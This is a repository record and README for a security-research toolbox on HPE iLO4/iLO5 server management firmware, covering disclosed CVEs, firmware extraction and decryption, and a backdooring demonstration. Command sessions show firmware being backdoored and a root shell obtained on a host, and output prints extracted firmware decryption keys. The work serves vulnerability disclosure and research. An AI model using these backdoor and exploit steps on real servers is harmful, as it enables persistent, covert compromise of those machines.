{"id":20602809,"url":"https://github.com/airbus-seclab/ilo4_toolbox","last_synced_at":"2026-01-14T21:47:42.513Z","repository":{"id":29228330,"uuid":"120608394","full_name":"airbus-seclab/ilo4_toolbox","owner":"airbus-seclab","description":"Toolbox for HPE iLO4 \u0026 iLO5  analysis","archived":true,"fork":false,"pushed_at":"2024-01-16T18:14:13.000Z","size":18122,"stargazers_count":426,"open_issues_count":5,"forks_count":82,"subscribers_count":40,"default_branch":"master","last_synced_at":"2025-07-01T09:56:07.223Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/airbus-seclab.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"COPYING","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2018-02-07T11:48:20.000Z","updated_at":"2025-06-20T12:44:12.000Z","dependencies_parsed_at":"2024-12-15T07:05:28.769Z","dependency_job_id":"e5fac0f1-c098-4e66-a5f1-e402288528b8","html_url":"https://github.com/airbus-seclab/ilo4_toolbox","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/airbus-seclab/ilo4_toolbox","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/airbus-seclab%2Filo4_toolbox","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/airbus-seclab%2Filo4_toolbox/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/airbus-seclab%2Filo4_toolbox/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/airbus-seclab%2Filo4_toolbox/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/airbus-seclab","download_url":"https://codeload.github.com/airbus-seclab/ilo4_toolbox/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/airbus-seclab%2Filo4_toolbox/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28436200,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-14T21:32:52.117Z","status":"ssl_error","status_checked_at":"2026-01-14T21:32:33.442Z","response_time":107,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-16T09:14:51.669Z","updated_at":"2026-01-14T21:47:42.495Z","avatar_url":"https://github.com/airbus-seclab.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"Subverting your server through its BMC: the HPE iLO4 case\r\n=========================================================\r\n\r\n\r\nIntroduction\r\n------------\r\n\r\n``iLO`` is the server management solution embedded in almost every ``HPE``\r\nservers for more than 10 years. It provides every feature required by a system\r\nadministrator to remotely manage a server without having to reach it\r\nphysically. Such features include power management, remote system console,\r\nremote CD/DVD image mounting, as well as many monitoring indicators.\r\n\r\nWe've performed a deep dive security study of ``HPE iLO4`` (known to be used on\r\nthe family of servers ``HPE ProLiant Gen8`` and ``ProLiant Gen9`` servers) and\r\nthe results of this study were presented at the **REcon** conference held in\r\nBrussels (February 2 - 4, 2018, see [1]_).\r\n\r\nA follow-up of our study was presented at the **SSTIC** conference, held in\r\nFrance (Rennes, June 13 - 15, 2018, see [8]_). We focused this talk on\r\nfirmware backdooring and achieving long-term persistence.\r\n\r\nIn November 2018, we presented our latest research on ``HPE iLO4`` and\r\n``iLO5`` at **ZeroNights** conference, held in Saint-Petersburg, Russia\r\n(November 20 - 21, 2018, see [11]_). This talk was focused on the attack\r\nsurface exposed to the host operating system and on the new secure boot\r\nfeature (silicon root of trust) introduced with ``iLO5``.\r\n\r\n``iLO4`` runs on a dedicated ``ARM`` processor embedded in the server,\r\nand is totally independent from the main processor. It has a dedicated flash\r\nchip to hold its firmware, a dedicated RAM chip and a dedicated network\r\ninterface. On the software side, the operating system is the proprietary RTOS\r\nGreenHills Integrity [2]_.\r\n\r\n\r\nResults\r\n-------\r\n\r\nOne critical vulnerability was identified and reported to the ``HPE PSRT`` in\r\nFebruary 2017, known as ``CVE-2017-12542`` (``CVSSv3`` base score 9.8 [3]_) :\r\n\r\n* Authentication bypass and remote code execution\r\n* Fixed in ``iLO4`` versions ``2.53`` (released in May 2017, buggy) and ``2.54`` [4]_\r\n\r\n\r\nA second critical vulnerability was identified in  ``iLO4`` and  ``iLO5`` . It\r\nwas reported to the ``HPE PSRT`` in April 2018 and is known as\r\n``CVE-2018-7078`` (``CVSSv3`` base score 7.2 [9]_, ``HPE`` Security Bulletin\r\n``HPESBHF03844`` [10]_) :\r\n\r\n* Remote or local code execution\r\n* Fixed in ``iLO4`` version ``2.60`` (released in May 2018)\r\n* Fixed in ``iLO5`` version ``1.30`` (released in June 2018)\r\n\r\n\r\nA critical vulnerability was identified in the implementation of the\r\nsecure boot feature of ``iLO5``. It was reported to the ``HPE PSRT`` in\r\nSeptember 2018 and is known as ``CVE-2018-7113`` (``CVSSv3`` base score 6.4 [12]_,\r\n``HPE`` Security Bulletin ``HPESBHF03894`` [13]_):\r\n\r\n* Local Bypass of Security Restrictions\r\n* Fixed in ``iLO5`` version ``1.37`` (released in October 2018)\r\n\r\n\r\nFinally another critical vulnerability allowing host to iLO arbitrary code\r\nexecution was reported to ``HPE`` in Feb 2021 and is known as\r\n``CVE-2021-29202`` (``CVSSv3`` base score 6.4, ``HPE`` Security Bulletins\r\n``HPESBHF04121`` [19]_ and ``HPESBHF04133`` [20]_). It impacts ``iLO4`` and\r\n``iLO5``.\r\n\r\n\r\nSlides and demos\r\n----------------\r\n\r\nREcon Brussels 2018\r\n*******************\r\n\r\nThe slides from our **REcon** talk are available here_ . They cover the\r\nfollowing points:\r\n\r\n* Firmware unpacking and memory space understanding\r\n* GreenHills OS Integrity internals:\r\n\r\n    * kernel object model\r\n    * virtual memory\r\n    * process isolation\r\n\r\n* Review of exposed attack surface: ``www``, ``ssh``, *etc.*\r\n* Vulnerability discovery and exploitation\r\n* Demonstration of a new exploitation technique that allows to\r\n  compromise the host server operating system through DMA.\r\n\r\n\r\nTo illustrate them, we also release the three demos as videos. The first one\r\ndemonstrates the use of the vulnerability we discovered to bypass the\r\nauthentication from the RedFish API:\r\n\r\n\r\n.. image:: https://github.com/airbus-seclab/ilo4_toolbox/blob/master/demos/demo1_connection_bypass.gif\r\n    :width: 100%\r\n    :align: center\r\n\r\nIn the second one we show how the vulnerability can also be turned into an\r\narbitrary remote code execution (``RCE``) in the process of the web server;\r\nallowing read access to the ``iLO`` file-system for example.\r\n\r\n\r\n.. image:: https://github.com/airbus-seclab/ilo4_toolbox/blob/master/demos/demo2_dump_users.gif\r\n    :width: 100%\r\n    :align: center\r\n\r\nFinally, in  the third videos, we leverage this ``RCE`` to exploit an ``iLO4``\r\nfeature which allows us to access (``RW``) to the host memory and inject a\r\npayload in the host Linux kernel.\r\n\r\n\r\n.. image:: https://github.com/airbus-seclab/ilo4_toolbox/blob/master/demos/demo3_host_pwn.gif\r\n    :width: 100%\r\n    :align: center\r\n\r\n\r\nSSTIC 2018\r\n**********\r\n\r\nThe slides from our **SSTIC** talk are available at this location_ (more\r\ndetails can be found in the paper_). After a brief recap of our **REcon**\r\ntalk, we propose the following new materials:\r\n\r\n* Firmware security and boot chain analysis\r\n* Backdoor architecture\r\n\r\nTo illustrate these works, we release a new demo as video. It demonstrates\r\nthe use of the vulnerability we discovered in the web server to flash a new\r\nbackdoored firmware. Then we demonstrate the use of the DMA communication\r\nchannel to execute arbitrary commands on the host system.\r\n\r\n.. image:: https://github.com/airbus-seclab/ilo4_toolbox/blob/master/demos/demo4_backdoor.gif\r\n    :width: 100%\r\n    :align: center\r\n\r\n\r\nZeroNights 2018\r\n***************\r\n\r\nThe material we presented at **ZeroNights** is available from there_. It\r\ncontains two major contributions.\r\n\r\nFirst, an analysis of the communication channel between the host system and\r\nthe ``iLO`` (``4`` or ``5``), known as ``CHIF`` channel interface. It opens a\r\nnew attack surface,  exposed to the host (even though ``iLO`` is set as\r\ndisabled). We demonstrated that the exploitation of ``CVE-2018-7078`` could\r\nallow us to flash a backdoored firmware from the host through this interface.\r\n\r\nThen, an in-depth review of the new secure boot feature introduced with\r\n``iLO5`` and ``HPE Gen10`` server line. It covers the complete bootchain, from\r\nthe ``iLO ASIC`` (silicon root of trust) down to the ``Integrity`` kernel and\r\nuserland images. We discovered a logic error (``CVE-2018-7113``) in the kernel\r\ncode responsible for the integrity verification of the userland image, which\r\ncan be exploited to break the chain-of-trust.\r\n\r\nTo illustrate this defeat of the secure boot feature, we propose the new video\r\nbelow. It demonstrates the exploitation of the logic error to update the\r\n``iLO5`` firmware with a compromised firmware embedding a backdoored userland\r\nimage in which the banner of the ``SSH`` server has been altered.\r\n\r\n\r\n.. image:: https://github.com/airbus-seclab/ilo4_toolbox/blob/master/demos/demo5_secure_boot.gif\r\n    :width: 100%\r\n    :align: center\r\n\r\n\r\nA proof of concept implementing the secure boot bypass alone is available in\r\n``ilo5_PoC_secure_boot_bypass.py``. The ``fum`` vulnerability and ``HP Signed File``\r\nsignature bypass is demonstrated in ``ilo5_PoC_fum_sig_bypass.py``.\r\n\r\n\r\n\r\nInsomni’Hack 2019\r\n*****************\r\n\r\nThe slides from our talk at **Insomni’Hack**, available from this link_,\r\nintend to wrap-up most of our work on the ``iLO 4`` and  ``5`` systems.\r\n\r\nA brief analysis of the anti-downgrade feature is introduced, as well as a\r\nteaser on the whitepaper_ we published in collaboration with Adrien Guinet\r\n(from Quarkslab) on *How to defeat NotPetya from your iLO4*.\r\n\r\n\r\n\r\nSSTIC 2021\r\n**********\r\n\r\nIn this new iteration of our work, presented at SSTIC (paper [17]_ and slides\r\n[18]_), we propose an extensive analysis of the new firmware encryption\r\nmechanism introduced with HPE iLO5 firmware versions 2.x. The new boot chain,\r\nas well as the cryptographic co-processor this feature relies upon are\r\npresented, as well as our attack to extract the encryption keys from the\r\nsystem-on-chip(SOC).\r\n\r\n\r\n\r\nBlack Hat USA 2021\r\n******************\r\n\r\nThis talk goes back to the research we presented at SSTIC 2021, with more\r\ndetails given on some OS-level features and exploitation tricks though. Also,\r\nthe slides [21]_ are in English.\r\n\r\n\r\n\r\nRelated works\r\n-------------\r\n\r\nA critical vulnerability was identified by Nicolas Iooss from The French\r\nNational Cybersecurity Agency (ANSSI) in the ``SSH`` service of ``iLO3``,\r\n``iLO4`` and  ``iLO5`` . It was reported to the ``HPE PSRT`` in April 2018 and\r\nis known as ``CVE-2018-7105`` (``CVSSv3`` base score 7.2 [14]_, ``HPE``\r\nSecurity Bulletin ``HPESBHF03866`` [15]_) :\r\n\r\n* Remote execution of arbitrary code, local disclosure of sensitive information\r\n* Fixed in ``iLO3`` version ``1.90`` (released in August 2018)\r\n* Fixed in ``iLO4`` version ``2.61`` (released in September 2018)\r\n* Fixed in ``iLO5`` version ``1.35`` (released in August 2018)\r\n\r\nThank you Nicolas for sharing test and exploitation scripts for this issue.\r\n\r\nUsing this vulnerability it is also possible to play with ``PCILeech`` on\r\n``HP iLO4`` without the need for a modified firmware. Although very slow for\r\na big memory dump, it works very well when targeting specific memory location, as\r\ndone by the Windows KMD load in ``PCILeech``. See the ``PCILeech HP iLO4\r\nService`` repository [16]_.\r\n\r\n\r\nTooling\r\n-------\r\n\r\nTo support our research we've developed scripts and tools to help us\r\nautomatize some tasks, especially firmware unpacking and mapping.\r\n\r\n\r\nFirmware\r\n********\r\n\r\n``ilo4_extract.py`` script takes an ``HP Signed file`` as input (obtained from\r\nthe update package). It is invoked with:\r\n\r\n::\r\n\r\n    \u003epython ilo4_extract.py ilo4_244.bin extract\r\n\r\n\r\nExtract from the output log:\r\n\r\n::\r\n\r\n    [+] iLO Header 0: iLO4 v 2.44.7 19-Jul-2016\r\n      \u003e magic              : iLO4\r\n      \u003e build_version      :  v 2.44.7 19-Jul-2016\r\n      \u003e type               : 0x08\r\n      \u003e compression_type   : 0x1000\r\n      \u003e field_24           : 0xaf8\r\n      \u003e field_28           : 0x105f57\r\n      \u003e decompressed_size  : 0x16802e0\r\n      \u003e raw_size           : 0xd0ead3\r\n      \u003e load_address       : 0xffffffff\r\n      \u003e field_38           : 0x0\r\n      \u003e field_3C           : 0xffffffff\r\n      \u003e signature\r\n\r\n\r\nFrom the extracted file, ``ilo0.bin`` is the ``Integrity`` applicative image\r\n(userland). It contains all the tasks that will run on the ``iLO`` system. To\r\nparse each of these tasks and generate the ``IDA Pro`` loading script, one can\r\nuse the script ``dissection.rb``.\r\n\r\nIt relies upon the ``Metasm`` framework [5]_ and also requires the ``Bindata``\r\nlibrary [6]_.\r\n\r\n::\r\n\r\n    \u003eruby dissection.rb ilo0.bin\r\n\r\n\r\nBack to the kernel image, ``ilo4_extract.py`` told us that:\r\n\r\n::\r\n\r\n    [+] iLO Header 1: iLO4 v 0.8.36 16-Nov-2015\r\n      \u003e magic              : iLO4\r\n      \u003e build_version      :  v 0.8.36 16-Nov-2015\r\n      \u003e type               : 0x02\r\n      \u003e compression_type   : 0x1000\r\n      \u003e field_24           : 0x9fd\r\n      \u003e field_28           : 0x100344\r\n      \u003e decompressed_size  : 0xc0438\r\n      \u003e raw_size           : 0x75dad\r\n      \u003e load_address       : 0x20001000\r\n      \u003e field_38           : 0x0\r\n      \u003e field_3C           : 0xffffffff\r\n\r\nUsing ``IDA Pro`` to load the extracted file ``ilo1.bin`` at ``0x20001000`` as\r\n``ARM`` code, one can also study the ``Integrity`` kernel.\r\n\r\n\r\n* ``secinfo4.py`` parses the section information embedded into the kernel image\r\n  and creates the appropriate memory segment in the disassembler\r\n* ``parse_mr.py`` dumps the registered ``Memory Region`` objects\r\n\r\n\r\n``iLO5`` format differs slightly but is supported as well. ``ilo5_extract.py``\r\nand  ``dissection.rb`` scripts can be used in the same way as for ``iLO4`` to\r\nextract the ``Integrity`` applicative image.\r\n\r\n\r\nFirmware encryption\r\n*******************\r\n\r\nStarting with ``iLO5`` verions ``2.x``, newer firmware are encrypted. The\r\nexternal enveloppe can be removed using the script ``ilo5_fw_decrypt.py``.\r\n\r\n::\r\n\r\n    \u003epython ilo5_fw_decrypt.py --infile ilo5_235.bin\r\n    [+] input file: \"ilo5_235.bin\"\r\n    [+] skipping HP Signed File fingerprint (2088 bytes)\r\n    [+] loading RSA pem (\"rsa_private_key_ilo5.asc\")\r\n    \u003e key size: 4096\r\n    [+] aes key material\r\n    \u003e aes key: c2447180a96f6ec4b23ed5539a63548118573ccfb9866f5cacf8f13c42c5acbe\r\n    \u003e aes iv: d13dcf4b12248561479488ad\r\n    --\r\n\r\n    [+] decrypting\r\n    \u003e ok\r\n    [+] writing output file \"ilo5_235.clear.bin\":\r\n\r\n               ┌───────────────  firmware header  ───────────────┬──────────────────┐\r\n    0x00000000 │ 6e 65 62 61 39 20 30 2e 31 30 2e 31 33 00 00 00 │ neba9 0.10.13... │\r\n    0x00000010 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ │\r\n    0x00000020 │ 1a 41 dd 4e 02 00 00 00 05 00 01 00 04 00 00 00 │ .A.N............ │\r\n    0x00000030 │ 00 00 00 00 00 00 00 00 50 8f 61 6b 00 00 00 00 │ ........P.ak.... │\r\n    0x00000040 │ 44 56 00 00 fe 10 5e d7 44 56 00 00 44 56 00 00 │ DV....^.DV..DV.. │\r\n    0x00000050 │ ff ff ff ff 00 00 00 00 02 00 00 00 2b 04 f2 81 │ ............+... │\r\n    0x00000060 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ │\r\n    0x00000070 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ │\r\n    0x00000080 │ 43 6f 70 79 72 69 67 68 74 20 32 30 31 39 20 48 │ Copyright 2019 H │\r\n    0x00000090 │ 65 77 6c 65 74 74 20 50 61 63 6b 61 72 64 20 45 │ ewlett Packard E │\r\n    0x000000a0 │ 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f │ nterprise Develo │\r\n    0x000000b0 │ 70 6d 65 6e 74 2c 20 4c 50 00 00 00 00 00 00 00 │ pment, LP....... │\r\n    0x000000c0 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ │\r\n    0x000000d0 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ │\r\n    0x000000e0 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ │\r\n    0x000000f0 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ │\r\n               └─────────────────────────────────────────────────┴──────────────────┘\r\n    [!] done captain\r\n\r\n\r\nOne can then proceed to the extraction of the various firmware components\r\nusing ``ilo5_extract.py``. The main userland image is also encrypted.\r\nDepending on the version, different private keys are used. The script\r\n``ilo5_image_decrypt.py`` comes with some private keys extracted for versions\r\n``2.3x`` and ``2.41``.\r\n\r\n\r\n::\r\n\r\n    \u003epython ilo5_image_decrypt.py --rawfile elf_secure_241.raw --hdrfile elf_secure_241.hdr\r\n    [+] loading header file elf_secure_241.raw\r\n    \u003e version string: 2.41\r\n    [+] loading elf_secure_241.raw\r\n    [+] ec pub key\r\n    \u003e pub.pointQ.x: 0x484ed202be9af305af716e7eef2d8b00c6ceba7337ed980a4af96079d06e4b810c15451ba82b9ff10cd830b30376ee39\r\n    \u003e pub.pointQ.y: 0x9dd95b116424f44b0e23776e3ed85fa46b76b4922047f993f450ec89134bb7ea0770eaf851b04fa0e074e813ece4df4d\r\n    --\r\n    [+] ec priv key\r\n    \u003e priv.pointQ.x: 0xcf1093db93ad3bb9bb7050e88f417e7b054c37b02b01120318cd88faf5e3b957fa6fa15f64c7cd6d84bdd4e88cac6ea8\r\n    \u003e priv.pointQ.y: 0xb1f8f0bd675d05e7e0463823f2f30e2d85f3b75302af65e892451236baff9e15b76a3be2f5d39c37b08f6c65ee14203c\r\n    \u003e priv.d: 0xffa8193746dd557afe519993d8c18de66556675d840970265bfa9ba870a2cd84ff2a45d656240631cf91bdbf767c6beb\r\n    --\r\n\r\n    [+] shared secret:\r\n    6c20dad5c5751a8ce7b6e012c3fbd5198c142edb9a52bf203a3102d783cbc8c7dd28bcac5739b62922b36e928daae51c\r\n    --\r\n\r\n    [+] aes key material\r\n    \u003e aes key: f16f2fa26032cc4de5c9c74d889981b54759f40add797329befaae36067878ea548a6f6a7edae2aae8f877054cfa54c0\r\n    \u003e aes iv: cf12bc3b76d5a386c9f74332\r\n    --\r\n\r\n    [+] decrypting\r\n    \u003e ok\r\n               ┌───────────────  firmware header  ───────────────┬──────────────────┐\r\n    0x00000000 │ 32 2e 34 31 2e 30 32 00 00 00 00 00 00 00 00 00 │ 2.41.02......... │\r\n    0x00000010 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ │\r\n    0x00000020 │ 1a 41 dd 4e 02 00 00 00 00 00 21 00 05 00 00 00 │ .A.N......!..... │\r\n    0x00000030 │ 01 00 00 00 00 00 00 00 b5 11 00 00 00 00 00 00 │ ................ │\r\n    0x00000040 │ 05 60 ff 00 24 e0 44 c7 05 60 ff 00 88 ec e8 01 │ .`..$.D..`...... │\r\n    0x00000050 │ ff ff ff ff 00 00 00 00 01 00 00 00 17 a6 e3 b6 │ ................ │\r\n    0x00000060 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ │\r\n    0x00000070 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ │\r\n    0x00000080 │ 43 6f 70 79 72 69 67 68 74 20 32 30 32 31 20 48 │ Copyright 2021 H │\r\n    0x00000090 │ 65 77 6c 65 74 74 20 50 61 63 6b 61 72 64 20 45 │ ewlett Packard E │\r\n    0x000000a0 │ 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f │ nterprise Develo │\r\n    0x000000b0 │ 70 6d 65 6e 74 2c 20 4c 50 00 00 00 00 00 00 00 │ pment, LP....... │\r\n    0x000000c0 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ │\r\n    0x000000d0 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ │\r\n    0x000000e0 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ │\r\n    0x000000f0 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ │\r\n               └─────────────────────────────────────────────────┴──────────────────┘\r\n\r\n\r\n\r\n\r\nFirmware backdooring\r\n********************\r\n\r\nThe ``insert_backdoor.sh`` script can be run on a legitimate firmware file to\r\nadd a backdoor in the webserver module. The backdoor can then be used using\r\nthe ``backdoor_client.py`` script.\r\n\r\n::\r\n\r\n    \u003e./insert_backdoor.sh ilo4_250.bin\r\n    [...]\r\n    [+] Firmware ready to be flashed\r\n\r\n    \u003epython backdoor_client.py 192.168.42.78\r\n    [+] iLO Backdoor found\r\n    [-] Linux Backdoor not detected\r\n    [...]\r\n    \u003e\u003e\u003e ib.install_linux_backdoor()\r\n    [*] Dumping kernel...\r\n    [+] Dumped 1000000 bytes!\r\n    [+] Found syscall table @0xffffffff81a001c0\r\n    [+] Found sys_read @0xffffffff8121e510\r\n    [+] Found call_usermodehelper @0xffffffff81098520\r\n    [+] Found serial8250_do_pm @0xffffffff81528760\r\n    [+] Found kthread_create_on_node @0xffffffff810a2000\r\n    [+] Found wake_up_process @0xffffffff810ad860\r\n    [+] Found __kmalloc @0xffffffff811f8c50\r\n    [+] Found slow_virt_to_phys @0xffffffff8106c6a0\r\n    [+] Found msleep @0xffffffff810f0050\r\n    [+] Found strcat @0xffffffff8140c9c0\r\n    [+] Found kernel_read_file_from_path @0xffffffff812236e0\r\n    [+] Found vfree @0xffffffff811d7f90\r\n    [+] Shellcode written\r\n    [+] iLO Backdoor found\r\n    [+] Linux Backdoor found\r\n    \u003e\u003e\u003e ib.cmd(\"/usr/bin/id\")\r\n    [+] Found shared memory page! 0xeab00000 / 0xffff8800eab00000\r\n    uid=0(root) gid=0(root) groups=0(root)\r\n\r\n\r\nForensics\r\n*********\r\n\r\nThe ``exploit_check_flash.py`` script can be run against an instance of ``HP\r\niLO4`` vulnerable to ``CVE-2017-12542``. Its purpose it to dump the content of\r\nthe flash and then compare its digest with a known \"good\" value.\r\n\r\n::\r\n\r\n    \u003epython exploit_check_flash.py 192.168.42.78 250\r\n\r\n\r\nNetwork\r\n*******\r\n\r\nFinally, to help people scan for existing vulnerable ``iLO`` systems exposed in\r\ntheir own infrastructures, we release a simple ``Go`` scanner. It attempts to\r\nfetch a special ``iLO`` page:  ``/xmldata?item=ALL``; if it exists, then it\r\nextracts the firmware version and HP server type.\r\n\r\n\r\nFirst edit the \"``targets``\" variable in the code and specify the internal\r\n``IP`` ranges you want to scan.\r\n\r\n::\r\n\r\n   var (\r\n        targets = []string{\r\n                \"10.0.0.0/8\",\r\n                \"192.168.66.0/23\",\r\n                \"172.16.133.0/24\"}\r\n   )\r\n\r\n\r\nThen compile the code for your OS/architecture.\r\n\r\n::\r\n\r\n    \u003e env GOOS=target-OS GOARCH=target-architecture go build iloscan.go\r\n\r\n\r\nFor example:\r\n\r\n::\r\n\r\n    \u003e env GOOS=openbsd GOARCH=amd64 go build iloscan.go\r\n    \u003e ./iloscan\r\n\r\nThen look the result in ``/tmp/iloscan.log`` (can be changed in the source):\r\n\r\n::\r\n\r\n    \u003e less /tmp/iloscan.log\r\n    192.168.66.69{{ RIMP} [{{ HSI} ProLiant DL380 G7}] [{{ MP} 1.80 ILOCZ2069K2S4       ILO583970CZ2069K2S4}]}\r\n\r\nAlternatively, you can invoke the binary with a subnet on the command line (individual IP addresses should be specified as a /32 netmask):\r\n\r\n::\r\n\r\n    \u003e ./iloscan 1.2.3.4/32\r\n    Generated 1.2.3.4\r\n    Fetching 1.2.3.4\r\n    1.2.3.4 status: 200 OK\r\n    {{ RIMP} [{{ HSI} ProLiant DL380 Gen9}] [{{ MP} 2.40 ILOCZJ641057H ILO826683CZJ641057H}]}\r\n\r\n\r\nAuthors\r\n-------\r\n\r\n* Fabien PERIGAUD - ``fabien [dot] perigaud [at] synacktiv [dot] com`` - ``@0xf4b``\r\n* Alexandre GAZET - ``alexandre [dot] gazet [at] airbus [dot] com``\r\n* Joffrey CZARNY  - ``snorky [at] insomnihack [dot] net`` - ``@\\_Sn0rkY``\r\n\r\n\r\n\r\nLicense\r\n-------\r\n\r\nThe scripts and scanner are released under the [GPLv2]_.\r\n\r\n\r\n\r\nReferences\r\n----------\r\n\r\n.. [1] https://recon.cx/2018/brussels/talks/subvert_server_bmc.html\r\n.. [2] https://www.ghs.com/products/rtos/integrity.html\r\n.. [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12542\r\n.. [4] http://h20565.www2.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us\r\n.. [5] https://github.com/jjyg/metasm\r\n.. [6] https://github.com/dmendel/bindata\r\n.. [8] https://www.sstic.org/2018/presentation/backdooring_your_server_through_its_bmc_the_hpe_ilo4_case/\r\n.. [9] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7078\r\n.. [10] https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03844en_us\r\n.. [11] https://2018.zeronights.ru/en/reports/turning-your-bmc-into-a-revolving-door/\r\n.. [12] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7113\r\n.. [13] https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03894en_us\r\n.. [14] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7105\r\n.. [15] https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03866en_us\r\n.. [16] https://github.com/Synacktiv/pcileech_hpilo4_service\r\n.. [17] https://airbus-seclab.github.io/ilo/SSTIC2021-Article-hpe_ilo_5_security_go_home_cryptoprocessor_youre_drunk-gazet_perigaud_czarny.pdf\r\n.. [18] https://airbus-seclab.github.io/ilo/SSTIC2021-Slides-hpe_ilo_5_security_go_home_cryptoprocessor_youre_drunk-gazet_perigaud_czarny.pdf\r\n.. [19] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbhf04121en_us\r\n.. [20] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbhf04133en_us\r\n.. [21] https://airbus-seclab.github.io/ilo/BHUSA2021-Slides-hpe_ilo_5_security_go_home_cryptoprocessor_youre_drunk-gazet_perigaud_czarny.pdf\r\n.. [GPLv2] https://github.com/airbus-seclab/ilo4_toolbox/blob/master/COPYING\r\n.. _here: https://github.com/airbus-seclab/airbus-seclab.github.io/blob/master/ilo/RECONBRX2018-Slides-Subverting_your_server_through_its_BMC_the_HPE_iLO4_case-perigaud-gazet-czarny.pdf\r\n.. _location: https://github.com/airbus-seclab/airbus-seclab.github.io/blob/master/ilo/SSTIC2018-Slides-EN-Backdooring_your_server_through_its_BMC_the_HPE_iLO4_case-perigaud-gazet-czarny.pdf\r\n.. _paper: https://airbus-seclab.github.io/ilo/SSTIC2018-Article-subverting_your_server_through_its_bmc_the_hpe_ilo4_case-gazet_perigaud_czarny.pdf\r\n.. _there: https://airbus-seclab.github.io/ilo/ZERONIGHTS2018-Slides-EN-Turning_your_BMC_into_a_revolving_door-perigaud-gazet-czarny.pdf\r\n.. _link: https://airbus-seclab.github.io/ilo/INSOMNIHACK2019-Slides-Riding_the_lightning_iLO4_5_BMC_security_wrapup-perigaud-gazet-czarny.pdf\r\n.. _whitepaper: https://airbus-seclab.github.io/ilo/Whitepaper-Defeating_NotPetya_from_your_iLO4-guinet-perigaud-gazet-czarny.pdf\r\n\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fairbus-seclab%2Filo4_toolbox","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fairbus-seclab%2Filo4_toolbox","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fairbus-seclab%2Filo4_toolbox/lists"}